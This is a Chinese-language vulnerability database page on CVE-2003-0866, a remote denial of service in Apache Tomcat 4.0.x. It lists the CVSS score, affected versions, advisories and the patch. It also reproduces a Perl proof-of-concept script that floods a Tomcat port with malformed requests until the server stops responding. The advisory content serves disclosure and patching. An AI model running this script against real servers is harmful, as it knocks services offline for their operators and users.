CVE-2003-0866
CVSS5.0
发布时间 :2003-11-17 00:00:00
修订时间 :2011-03-07 21:13:13
NMCOES    

[原文]The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.


[CNNVD]Apache Tomcat Non-HTTP请求远程拒绝服务攻击漏洞(CNNVD-200311-032)

        
        Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。
        Apache Tomcat在处理部分非HTTP类型请求时存在问题,远程攻击者可以利用这个漏洞对服务器进行拒绝服务攻击。
        目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:apache:tomcat:4.0.6Apache Software Foundation Tomcat 4.0.6
cpe:/a:apache:tomcat:4.0.3Apache Software Foundation Tomcat 4.0.3
cpe:/a:apache:tomcat:4.0.2Apache Software Foundation Tomcat 4.0.2
cpe:/a:apache:tomcat:4.0.1Apache Software Foundation Tomcat 4.0.1
cpe:/a:apache:tomcat:4.0.0Apache Software Foundation Tomcat 4.0.0
cpe:/a:apache:tomcat:4.0.5Apache Software Foundation Tomcat 4.0.5
cpe:/a:apache:tomcat:4.0.4Apache Software Foundation Tomcat 4.0.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0866
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0866
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-032
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/8824
(VENDOR_ADVISORY)  BID  8824
http://www.debian.org/security/2003/dsa-395
(VENDOR_ADVISORY)  DEBIAN  DSA-395
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=215506
(VENDOR_ADVISORY)  CONFIRM  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=215506
http://www.vupen.com/english/advisories/2008/1979/references
(UNKNOWN)  VUPEN  ADV-2008-1979
http://xforce.iss.net/xforce/xfdb/13429
(UNKNOWN)  XF  tomcat-non-http-dos(13429)
http://tomcat.apache.org/security-4.html
(UNKNOWN)  CONFIRM  http://tomcat.apache.org/security-4.html
http://sunsolve.sun.com/search/document.do?assetkey=1-26-239312-1
(UNKNOWN)  SUNALERT  239312
http://secunia.com/advisories/30908
(UNKNOWN)  SECUNIA  30908
http://secunia.com/advisories/30899
(UNKNOWN)  SECUNIA  30899

- 漏洞信息

Apache Tomcat Non-HTTP请求远程拒绝服务攻击漏洞
中危 其他
2003-11-17 00:00:00 2005-10-20 00:00:00
远程  
        
        Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。
        Apache Tomcat在处理部分非HTTP类型请求时存在问题,远程攻击者可以利用这个漏洞对服务器进行拒绝服务攻击。
        目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-395

- 漏洞信息 (23245)

Apache Tomcat 4.0.x Non-HTTP Request Denial Of Service Vulnerability (EDBID:23245)
linux dos
2003-10-15 Verified
0 Oliver Karow
N/A [点击下载]
source: http://www.securityfocus.com/bid/8824/info

Apache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types.

When certain non-HTTP request types are handled by the Tomcat HTTP connector, the Tomcat server will reject subsequent requests on the affected port until the service is restarted. 

#!/usr/bin/perl
#
# PoC - DoS Exploit for Apache Tomcat 4
# by Oliver Karow - oliver.karowNOSPAM__AT__gmx.de
# http://www.oliverkarow.de/research/tomcat_crash.txt
#
# Run this script against the Tomcat Admin Port. After execution, the page will not be accessible any more.
# The port is still open and accepting connections, but not responding with content. To verify, connect with your browser
# to the port.
#

use IO::Socket;

$ip="192.168.0.16";
$port="8080";
$counter =0;


@attackpattern=("'");
for ($x=0;$x<=400;$x++){
  $headerLine="GET /dummy/dontexist.pl? HTTP/1.0\n\n";
  @temp=split(/(\/)/,$headerLine);
  foreach (@temp){
     $replaceme=$_;
       foreach(@attackpattern){
    $attack=$_;
    $newheaderline=$headerLine;
      $newheaderline=~ s/$replaceme/$attack/i;
      $remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection not possible\n";
    print $remote $newheaderline;
    print "\nRequest: ".$counter++." \t".$newheaderline."\n";
       $remote->close;
  }
  }
}
		

- 漏洞信息

8772
Apache Tomcat Catalina org.apache.catalina.connector.http DoS
Denial of Service
Loss of Availability
Vendor Verified

- 漏洞描述

Apache Tomcat contains a flaw that may allow a remote attacker to cause a denial of service. The issue occurs when a series of malformed HTTP requests are sent that cause the request processing thread to become unresponsive until the server is restarted by an administrator.

- 时间线

2003-10-15 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 8824
Yes No
2003-10-15 12:00:00 2008-09-05 06:41:00
Discovery of this vulnerability has been credited to Aldrin Martoq.

- 受影响的程序版本

Sun Solaris 9_x86
Sun Solaris 9_sparc
Sun Solaris 9
Sun Solaris 10_x86
Sun Solaris 10_sparc
Sun Solaris 10
Apache Software Foundation Tomcat 4.0.6
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
Apache Software Foundation Tomcat 4.0.5
+ RedHat Stronghold 4.0
Apache Software Foundation Tomcat 4.0.4
Apache Software Foundation Tomcat 4.0.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
Apache Software Foundation Tomcat 4.0.2
Apache Software Foundation Tomcat 4.0.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 3.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 4.0
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 4.1.24
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2

- 不受影响的程序版本

Apache Software Foundation Tomcat 4.1.24
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2

- 漏洞讨论

Apache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types.

When certain non-HTTP request types are handled by the Tomcat HTTP connector, the Tomcat server will reject subsequent requests on the affected port until the service is restarted.

- 漏洞利用

The following exploit has been provided:

- 解决方案

Fixes are available. Please see the references for details.


Sun Solaris 9

Sun Solaris 9_x86

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站